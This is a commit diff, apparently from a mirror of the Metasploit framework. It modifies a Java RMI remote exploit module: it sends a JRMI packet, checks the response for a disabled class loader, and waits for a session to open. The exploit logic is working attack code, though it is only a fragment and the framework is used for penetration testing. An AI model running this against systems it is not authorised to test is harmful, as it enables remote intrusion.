Smarter RMI class loader logic
parent
4c2e1c2859
commit
ec831a1658
|
@ -106,10 +106,26 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
# write out minimal header and packet
|
# write out minimal header and packet
|
||||||
print_status("Connected and sending request for #{new_url}")
|
print_status("Connected and sending request for #{new_url}")
|
||||||
#sock.put("JRMI" + [2].pack("n") + "K" + [0].pack("n") + [0].pack("N") + packet);
|
#sock.put("JRMI" + [2].pack("n") + "K" + [0].pack("n") + [0].pack("N") + packet);
|
||||||
sock.put("JRMI" + [2,0x4b,0,0].pack("nCnN") + packet);
|
sock.put("JRMI" + [2,0x4b,0,0].pack("nCnN") + packet)
|
||||||
|
|
||||||
# wait for the request to be handled
|
buf = ""
|
||||||
while not session_created?
|
1.upto(6) do
|
||||||
|
res = sock.get_once(-1, 5) rescue nil
|
||||||
|
break if not res
|
||||||
|
break if session_created?
|
||||||
|
buf << res
|
||||||
|
end
|
||||||
|
|
||||||
|
if buf =~ /RMI class loader disabled/
|
||||||
|
print_error("Not exploitable: the RMI class loader is disabled")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
print_good("Target #{rhost}:#{rport} may be exploitable...")
|
||||||
|
|
||||||
|
# Wait for the request to be handled
|
||||||
|
1.upto(80) do
|
||||||
|
break if session_created?
|
||||||
select(nil, nil, nil, 0.25)
|
select(nil, nil, nil, 0.25)
|
||||||
handler()
|
handler()
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue